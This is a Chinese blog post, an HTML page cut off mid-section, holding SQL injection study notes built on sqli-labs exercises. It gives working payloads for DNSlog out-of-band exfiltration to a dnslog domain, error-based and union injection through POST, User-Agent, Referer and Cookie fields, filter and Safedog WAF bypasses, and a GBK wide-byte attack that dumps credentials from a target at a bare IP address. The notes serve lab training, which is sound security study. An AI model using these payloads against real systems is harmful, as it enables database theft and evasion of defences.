<!DOCTYPE html>
<html class="dark" lang="zh-CH" prefix="og: http://ogp.me/ns# 
fb: http://ogp.me/ns/fb#
article: http://ogp.me/ns/article#">
<head>
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="keywords" content="技术,生活">

<title>SQL注入相关 || L1uxsn&#39;Blog</title>
<link rel="icon" href="https://L1uxsn.github.ioimages/default-cover.webp" type="image/x-icon">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<meta property="og:title" content="SQL注入相关">
<meta property="og:type" content="website">
<meta property="og:url" content="https://l1uxsn.github.io/2026/07/12/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/index.html">
<meta property="og:image" content="">
<meta property="og:site_name" content="L1uxsn&#39;Blog">
<meta property="og:author" content="L1uxsn">

  
  
  
  <meta name="description" content="SQL注入相关DNSlog注入1234567selectload_file(&amp;quot;\\192.168.134.128\123\test.txt&amp;quot;);他会去访问192.168.134.128下面的123文件夹里的test.txt文件selectload_file(&amp;quot;\\(selectd">


<script src="/js/wang.js"></script>

<link rel="stylesheet" href="/css/wang.css">
<script> console.log("Hello"); </script>
<meta name="generator" content="Hexo 8.1.1"></head>
<body>
<main>
    <div id="agplAlert" style="z-index: 9999;">
    <strong>请遵守AGPL 3.0协议</strong> 本主题已开源于<a target="_blank" rel="noopener" href="https://github.com/xingwangzhe/hexo-theme-wang">hexo-theme-wang</a>
</div>
    <header>
    <nav>
        <ul>
            
                <li>
                    <a href="/" rel="noopener">
                        
                            <img src="/images/menu_ico/home.svg" class="menu-icon" alt="首页">
                        
                        首页
                    </a>
                </li>
            
                <li>
                    <a href="/archives" rel="noopener">
                        
                            <img src="/images/menu_ico/archives.svg" class="menu-icon" alt="归档">
                        
                        归档
                    </a>
                </li>
            
                <li>
                    <a href="/tags" rel="noopener">
                        
                            <img src="/images/menu_ico/tags.svg" class="menu-icon" alt="标签">
                        
                        标签
                    </a>
                </li>
            
                <li>
                    <a href="/links" rel="noopener">
                        
                            <img src="/images/menu_ico/links.svg" class="menu-icon" alt="友链">
                        
                        友链
                    </a>
                </li>
            
            
                <li>
                    <button class="search-toggle-btn" aria-label="打开搜索">
                        <img src="/images/menu_ico/search.svg" class="menu-icon" alt="search">
                        搜索
                    </button>
                </li>
            
        </ul>
    </nav>
</header>

<script src="/js/header.js"></script>

    
<script src="/js/search.js"></script>


    
        <!-- 搜索模态框 -->
        <div id="search-modal" class="search-modal">
          <div class="search-modal-content">
            <div class="search-header">
              <form class="search-form" action="#" onsubmit="return false;">
                <input type="text" id="search-input" placeholder="输入关键词搜索" autocomplete="off">
                <button type="button" class="search-close-btn" aria-label="关闭">
                  <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <line x1="18" y1="6" x2="6" y2="18"></line>
                    <line x1="6" y1="6" x2="18" y2="18"></line>
                  </svg>
                </button>
              </form>
            </div>
            <div id="search-results"></div>
          </div>
        </div>

        <script>
        // 向全局对象添加i18n数据，以便search.js使用
        window.WANG_THEME = window.WANG_THEME || {};
        window.WANG_THEME.i18n = {
          search: {
            noResults: '没有找到相关结果',
            loading: '正在加载...',
            placeholder: '输入关键词搜索',
            close: '关闭',
            shortcut_tip: '按 ESC 关闭',
            toggle_search: '打开搜索',
            error_loading: '加载搜索数据失败'
          }
        };
        </script>
    
    <aside class="sidebar-container sidebar-left">
    <div class="sidebar-bg">
        <h2 class="site-title">L1uxsn'Blog</h2>
        <img class="avatar avatar-round" src="/images/avatar.jpg" style="width:50px;" alt="网站头像">
        <h2 class="site-author">L1uxsn</h2>
        <h3 class="site-subtitle">分享技术和生活</h3>
    </div>
    <div class="sidebar-bg">
        <ul class="social_links">
            
                <li>
                    <a href="https://L1uxsn.github.io" aria-label="Github的链接">
                        
                            <div style="display: flex; margin-left: auto; margin-left: auto; justify-content: center;">
                                <img src="/images/social_links/github.svg" class="icon" alt="Github的图标"><p>Github</p>
                            </div>
                        
                    </a>
                </li>
            
                <li>
                    <a href="mailto:3586323056@qq.com" aria-label="Email的链接">
                        
                            <div style="display: flex; margin-left: auto; margin-left: auto; justify-content: center;">
                                <img src="/images/social_links/envelope.svg" class="icon" alt="Email的图标"><p>Email</p>
                            </div>
                        
                    </a>
                </li>
            
        </ul>
    </div>
</aside>
<div class="post-container">
  <article class="post">
    <h1 class="post-title">SQL注入相关</h1>

    <div class="post-meta">
      <span class="post-date">发布于 <time datetime="2026-07-12T14:36:06.000Z">2026-07-12</time></span>
      
        <span class="post-categories">
          分类：<a class="category-link" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
        </span>
      
      
        <span class="post-updated">
          最后更新于 <time datetime="2026-07-17T17:36:54.444Z">2026-07-18</time>
        </span>
      
      <span style="margin-left:10px;">👁<span id="busuanzi_value_page_pv"></span></span>
    </div>
    <div class="post-content">
      <h2 id="SQL注入相关"><a href="#SQL注入相关" class="headerlink" title="SQL注入相关"></a>SQL注入相关</h2><h3 id="DNSlog注入"><a href="#DNSlog注入" class="headerlink" title="DNSlog注入"></a>DNSlog注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">select load_file(&quot;\\192.168.134.128\123\test.txt&quot;);    他会去访问192.168.134.128下面的123文件夹里的test.txt文件</span><br><span class="line"></span><br><span class="line">select load_file(&quot;\\(select database())\123\test.txt&quot;); 数据库在执行这条指令之前，会先执行查询库名的指令，把查询的值和域名拼接起来，然后发生DNS查询，我们只要能获得DNS的日志，就得到了想要的值。所以我们需要有一个自己的域名，然后在域名商处配置一条NS记录，然后我们在DNS服务器上面获得DNS日志即可</span><br><span class="line"></span><br><span class="line">需要用到的网站：</span><br><span class="line">http://ceye.io</span><br><span class="line">https://dnslog.org/</span><br></pre></td></tr></table></figure>



<p>以less-9为例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">查库名：</span><br><span class="line">?id=1&#x27; and (select load_file(concat(&quot;//&quot;,(select database()),&quot;.4feea368.log.dnslog.qzz.io.&quot;)))--+</span><br><span class="line">查表名：</span><br><span class="line">?id=1&#x27; and (select load_file(concat(&quot;//&quot;,(select table_name from information_schema.tables where table_schema=database() limit 0,1),&quot;.4feea368.log.dnslog.qzz.io.&quot;)))--+</span><br><span class="line">查列名：</span><br><span class="line">?id=1&#x27; and (select load_file(concat(&quot;//&quot;,(select column_name from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27; limit 0,1),&quot;.4feea368.log.dnslog.qzz.io.&quot;)))--+</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/1.png"></p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/2.png"></p>
<h3 id="POST注入"><a href="#POST注入" class="headerlink" title="POST注入"></a>POST注入</h3><h5 id="POST-union注入"><a href="#POST-union注入" class="headerlink" title="POST union注入"></a>POST union注入</h5><p>查询方法和GET提交基本一样，只是提交位置不同而已</p>
<p>例如less11,使用万能密码 <code>admin&#39; or 1=1#</code> 可以直接登录，也可以进行union 联合注入</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/3.png"></p>
<h5 id="POST报错注入"><a href="#POST报错注入" class="headerlink" title="POST报错注入"></a>POST报错注入</h5><p>查询方法和GET提交基本一样，只是提交位置不同而已</p>
<p>例如less13:</p>
<p> <img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/4.png"></p>
<h3 id="HTTP头注入"><a href="#HTTP头注入" class="headerlink" title="HTTP头注入"></a>HTTP头注入</h3><h4 id="uagent注入"><a href="#uagent注入" class="headerlink" title="uagent注入"></a>uagent注入</h4><p>当页面看不到明显变化，找不到注入点，可以尝试报头注入</p>
<p>例题：less-18</p>
<p>查看源码发现注入出现点：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/41.png"></p>
<p>根据源码可以修改 ‘$uagent’，’$IP’(没有安全性输入检测)进行注入</p>
<p>利用报错注入(前提是用户名和密码需登陆正确):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">查库名：</span><br><span class="line">&#x27; or updatexml(1,concat(&#x27;~&#x27;,(select database())),3),2,3) #</span><br><span class="line">(&#x27;闭合前面的&#x27;,#注释掉后面的语句)</span><br></pre></td></tr></table></figure>



<p> <img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/5.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查表名：</span><br><span class="line">&#x27; or updatexml(1,concat(&#x27;~&#x27;,(select group_concat(table_name)from information_schema.tables where table_schema=database())),3),2,3) #</span><br></pre></td></tr></table></figure>

<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/6.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查列名：</span><br><span class="line">&#x27; or updatexml(1,concat(&#x27;~&#x27;,(select group_concat(column_name)from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database())),3),2,3) #</span><br></pre></td></tr></table></figure>

<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/7.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取数据：</span><br><span class="line">&#x27; or updatexml(1,concat(&#x27;~&#x27;,(select concat(username,&#x27;:&#x27;,password)from users limit 0,1)),3),2,3) #</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/8.png"></p>
<h4 id="Referer注入"><a href="#Referer注入" class="headerlink" title="Referer注入"></a>Referer注入</h4><p>源代码分析:</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/9.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO  &#x27;security&#x27;.&#x27;referers&#x27; (&#x27;referers&#x27;,&#x27;ip_address&#x27;) VALUES (1,2);</span><br></pre></td></tr></table></figure>



<p>利用报错注入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查表名：</span><br><span class="line">&#x27; or extractvalue(1,concat(&#x27;~&#x27;,(select database()))),3) # </span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/10.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查表名：</span><br><span class="line">&#x27; or extractvalue(1,concat(&#x27;~&#x27;,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),3) #  </span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/11.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查列名：</span><br><span class="line">&#x27; or extractvalue(1,concat(&#x27;~&#x27;,(select group_concat(column_name)from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database()))),3) #</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/12.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取数据：</span><br><span class="line">&#x27; or extractvalue(1,concat(&#x27;~&#x27;,(select concat(username,&#x27;:&#x27;,password)from users limit 1,1))),3) #  </span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/13.png"></p>
<h4 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h4><p>源码分析：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/14.png"></p>
<p>setcookie函数生成cookie</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/15.png"></p>
<p>利用union联合注入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查库名:</span><br><span class="line">&#x27; union select 1,database(),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/16.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查表名：</span><br><span class="line">&#x27; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/17.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查列名：</span><br><span class="line">&#x27; union select 1,(select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database() limit 0,1),3--+</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/18.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取数据:</span><br><span class="line">&#x27; union select 1,(select concat(username,&#x27;:&#x27;,password)from users limit 0,1),3--+</span><br></pre></td></tr></table></figure>



<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/19.png"></p>
<h3 id="sql注入绕过"><a href="#sql注入绕过" class="headerlink" title="sql注入绕过"></a>sql注入绕过</h3><h4 id="注释符号绕过"><a href="#注释符号绕过" class="headerlink" title="注释符号绕过"></a>注释符号绕过</h4><p>常用注释符号：</p>
<p><code> --  #  %23(#的url编码)</code></p>
<p>例题：less-23</p>
<p>源码分析：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/20.png"></p>
<p>#和–会被替换为空</p>
<p><strong>以单引号闭合为例，其他闭合方式绕过方法相同</strong></p>
<ul>
<li>1.可以多加一个 ‘ ,把后面源码的 ‘ 手动闭合</li>
</ul>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/21.png"></p>
<ul>
<li>2.也可以用 <code>or &#39;1&#39;=&#39;1</code> 手动闭合</li>
</ul>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/22.png"></p>
<p>其他闭合方式：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/23.png"></p>
<h4 id="and和or过滤绕过"><a href="#and和or过滤绕过" class="headerlink" title="and和or过滤绕过"></a>and和or过滤绕过</h4><p>分析源码得and和or被替换为空</p>
<ul>
<li>1.大小写绕过</li>
<li>2.复写绕过</li>
<li>3.用&amp;&amp;取代and,用|| 取代or (&amp;&amp;可用url编码%26%26代替)</li>
</ul>
<h4 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h4><p>les-26</p>
<p>源码分析：</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/24.png"></p>
<ul>
<li><p>1.使用+代替空格</p>
</li>
<li><p>2.使用&#x2F;**&#x2F;代替</p>
</li>
<li><p>3.使用url编码：</p>
</li>
</ul>
<p> <img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/25.png"></p>
<ul>
<li>4.使用报错注入</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;||extractvalue(1,concat(&#x27;~&#x27;,(database())))||&#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<p>在查表名，列名时可用 () 将要空格部分括起来</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/26.png"></p>
<h4 id="逗号过滤join绕过"><a href="#逗号过滤join绕过" class="headerlink" title="逗号过滤join绕过"></a>逗号过滤join绕过</h4><p>例题：less-25</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">select u.*,e.* from users u,emails e where u.id=e.id;</span><br><span class="line">给users这张表取名为u,emails这张表取名为e,并联合查询这两张表id相同的列的信息</span><br><span class="line"></span><br><span class="line">使用JOIN</span><br><span class="line">select u.*,e.* from users u JOIN emails e where u.id=e.id;</span><br></pre></td></tr></table></figure>



<p> JOIN绕过逗号原理：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id=1 union select * from (select 1)a JOIN (select 2)b JOIN (select 3)c;</span><br><span class="line">代替了union select 1,2,3  </span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">查库名：</span><br><span class="line">?id=-1 select * from users where id=1 union select * from (select 1)a JOIN (select database())b JOIN (select 3)c--+</span><br><span class="line">查表名：</span><br><span class="line">?id=-1 union select * from (select 1)a JOIN (select group_concat(table_name)from information_schema.tables where table_schema=database())b JOIN (select 3)c --+</span><br><span class="line">查列名：</span><br><span class="line">?id=-1 union select * from (select 1)a JOIN (select group_concat(column_name)from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database())b JOIN (select 3)c--+</span><br><span class="line">获取数据：</span><br><span class="line">?id=-1 union select * from (select 1)a JOIN (select concat(username)from users)b JOIN (select 3)c--+</span><br><span class="line">(因为逗号被过滤了，所以这里获取数据时不能concat(username,&#x27;:&#x27;,password)),只能分开一个一个的查询</span><br></pre></td></tr></table></figure>



<h4 id="union和select绕过"><a href="#union和select绕过" class="headerlink" title="union和select绕过"></a>union和select绕过</h4><ul>
<li>1.大小写绕过</li>
<li>2.复写绕过</li>
<li>3.尝试报错注入</li>
<li>4.尝试URL编码绕过（如less-28过滤相连的union select,使用union%0Aselect可以绕过）</li>
</ul>
<h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">addslashes() 函数返回在预定义字符之前添加反斜杠的字符串</span><br><span class="line">mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符</span><br><span class="line">mysql_escape_string() 转义一个字符串</span><br></pre></td></tr></table></figure>



<p>什么是宽字节？<br>字符大小为一个字节时为窄字节，字符大小为两个及以上的字节时为宽字节。</p>
<p>原理:</p>
<p>在开发网站过程中，一些程序员为了防止SQL注入，会使用反斜杠“\”对一些特殊字符进行转义。而我们在进行SQL注入过程中，经常通过闭合单引号或者双引号来判断是否存在注入点并进行接下来的注入操作。而开发人员就对引号进行转义来防止攻击者进行SQL注入攻击，通常开发语言中的转义字符都是反斜杠“\”<br>例如PHP开发语言中，magic_qutes_gpc()函数的作用就是对用户提交的数据进行解析，如有：post、get、cookie过来的数据增加转义符“\” 以确保这些数据不会引起程序错误。<br>但是攻击者总能想到办法来解决这个问题。因为“\”的转义后的编码为%5c，可以联想到我们中国的汉字有偏旁部首可以拼成一个汉字，那么对于转义字符编码%5c也可以找到一个编码跟它凑成一个新的字。<br>例如在GBK编码中%df%5c就是繁体字“連”，所以这是我们就可以成功的绕过magic_qutes_gpc()函数的转义。<br>注意:只有是中文编码的数据库才可以这样并且数据库的编码为GBK编码</p>
<p>例题:</p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/27.png"></p>
<ul>
<li>1.首先检测一下是否存在输入点</li>
</ul>
<p><code>“http://124.70.71.251:49790/new_list.php?id=1 and 1=2”</code></p>
<p>页面没有反应，说明and 1&#x3D;2 条件没有生效，代表通过get方式提交的id值可能被符号给引用了</p>
<ul>
<li>2.试试单引号:<code>http://124.70.71.251:49790/new_list.php?id=1&#39; and 1=2--+</code></li>
</ul>
<p>双引号:<br><code>http://124.70.71.251:49790/new_list.php?id=1&quot; and 1=2--+</code></p>
<p>经测试，页面均无反应，推测可能是对单引号和双引号进行了转义</p>
<ul>
<li>3.使用在引号前面加入%df测试一下。<code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; and 1=2--+</code></li>
</ul>
<p>发现在单引号前加入%df后，构造的and 1&#x3D;2发生了作用，使得页面没有正常回显。说明可以进行宽字节注入</p>
<ul>
<li>4.接下来就可以先来猜测后端查询语句所查询字段的个数了<code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; order by 5--+</code></li>
</ul>
<p><code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; order by 6--+</code></p>
<p>经测试发现5正常回显，6时报错，说明查询字段数为5</p>
<ul>
<li>5.查询回显位:</li>
</ul>
<p><code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; and 1=2 union select 1,2,3,4,5--+</code></p>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/28.png"></p>
<p>发现只有3和5回显，说明可在3和5的位置进行查询</p>
<ul>
<li>6.查库名:<br><code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; and 1=2 union select 1,2,group_concat(schema_name),4,database() from information_schema.schemata--+</code></li>
</ul>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/29.png"></p>
<ul>
<li>7.查表名:<br><code>http://124.70.71.251:49790/new_list.php?id=1%df&#39; and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=database() and table_name=&#39;stormgroup_member&#39;--+</code></li>
</ul>
<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/30.png"></p>
<p>发现页面报错，这时我们回想到开头我们判断是否存在注入点的时候，我们已经得到了一个结论，那就是单引号和双引号都被后端给转义了，而我们的payload中table_name&#x3D;’stormgroup_member’，就存在单引号，所有后端在查询的时候才会报错。<br>这里有两种方法绕过:</p>
<p>第一种也就是最快的一种:<br>直接将表名stormgroup_member变成ascii码(ASCII字符串到16进制在线转换工具 - Coding.Tools)，然后再拼接到payload中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://124.70.71.251:49790/new_list.php?id=1%df&#x27; and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=database() and table_name=0x73746f726d67726f75705f6d656d626572--</span><br></pre></td></tr></table></figure>



<p>第二种:<br>因为我们已经可以查出表名，并且当前数据库下只有两张表，且stormgroup_member表位于查询结果的第二位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://124.70.71.251:49790/new_list.php?id=1%df&#x27; and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)--+</span><br></pre></td></tr></table></figure>



<p>其中<code>(select table_name from information_schema.tables where table_schema=database() limit 1,1) </code>查询出来的结果就是stormgroup_member这张表名</p>
<p> <img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/31.png"></p>
<ul>
<li><p>8.获取信息：</p>
<p>这里就查询到了stormgroup_member这张表的所有列名信息，接下来就可以查询信息了</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://124.70.71.251:49790/new_list.php?id=1%df&#x27; and 1=2 union select 1,2,group_concat(password),4,group_concat(name) from stormgroup_member--+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/img/SQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3/32.png"></p>
<p>这样我们就爆出来stormgroup_member表中的数据<br>由于密码被MD5加密了所以我们要用MD5解密(md5在线解密破解,md5解密加密)之后，再登录页面进行登录，登录成功，将页面划到最底端就可以拿到KEY了</p>
<h4 id="安全狗4-0-26550绕过"><a href="#安全狗4-0-26550绕过" class="headerlink" title="安全狗4.0.26550绕过"></a>安全狗4.0.26550绕过</h4><p>注释：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/**/:在MYSQL里，多行解释是/**/</span><br><span class="line">/*!xxx*/:前面加上叹号，那么此解释里的语句将被执行 如/*!benben*/</span><br><span class="line">/*!50001xxx*/:这里的50001表示假如数据库是5.00.01以上版本，该语句才会被执行</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">当database()被过滤时，就可以使用database(/*!90000benben*/)绕过</span><br></pre></td></tr></table></figure>



<h4 id="安全狗3-5-12048绕过"><a href="#安全狗3-5-12048绕过" class="headerlink" title="安全狗3.5.12048绕过"></a>安全狗3.5.12048绕过</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">当union select 同时出现会被拦截时可以在union select 中插入一点东西以绕过，如 /*!90000benben*/,--+b%0A(--+注释掉后面部分的b，%0A换行后的内容不被注释掉)</span><br></pre></td></tr></table></figure>



<p><strong>information_schema被过滤：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">使用其他两张表：</span><br><span class="line">sys.schema_table_statistics_with_buffer和sys.x$ps_schema_table_statistics_io</span><br><span class="line"></span><br><span class="line">这两张表都含有的字段：</span><br><span class="line">table_schema(库名)，table_name(表名 )</span><br><span class="line"></span><br><span class="line">查询方法和information_schema一样，只需将information_schema替换为上述表名即可</span><br><span class="line">查表名：</span><br><span class="line">SELECT DISTINCT table_name FROM sys.schema_table_statistics_with_buffer WHERE table_schema = &#x27;your_db_name&#x27;;</span><br><span class="line"></span><br><span class="line">SELECT table_name FROM sys.x$ps_schema_table_statistics_io WHERE table_schema = &#x27;your_db_name&#x27;;</span><br><span class="line"></span><br><span class="line">查列名(派生表查询)：</span><br><span class="line">select group_concat(username,&#x27;:&#x27;, password) from (select * from users union select 1,2 as b,3 as c) as result;</span><br></pre></td></tr></table></figure>



<p>还有一张在做题的时候遇到的可以绕过的表，注意他的库名和information_schema的库名不一样，不是table_schema而是database_name</p>
<p><strong>mysql.innodb_table_stats介绍：</strong></p>
<p>主要字段：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">database_name   <span class="comment">-- 数据库名</span></span><br><span class="line">table_name      <span class="comment">-- 表名</span></span><br><span class="line">last_update     <span class="comment">-- 最后统计更新时间</span></span><br><span class="line">n_rows          <span class="comment">-- 估算的行数</span></span><br><span class="line">clustered_index_size <span class="comment">-- 聚簇索引大小（页数）</span></span><br><span class="line">sum_of_other_index_sizes <span class="comment">-- 其他索引大小（页数）</span></span><br></pre></td></tr></table></figure>

<p>在 SQL 注入中的用途：</p>
<ol>
<li><strong>查表名：</strong></li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> mysql.innodb_table_stats </span><br><span class="line"><span class="keyword">where</span> database_name <span class="operator">=</span> database()  <span class="comment">-- 当前数据库</span></span><br></pre></td></tr></table></figure>

<p>或查所有数据库的表：</p>
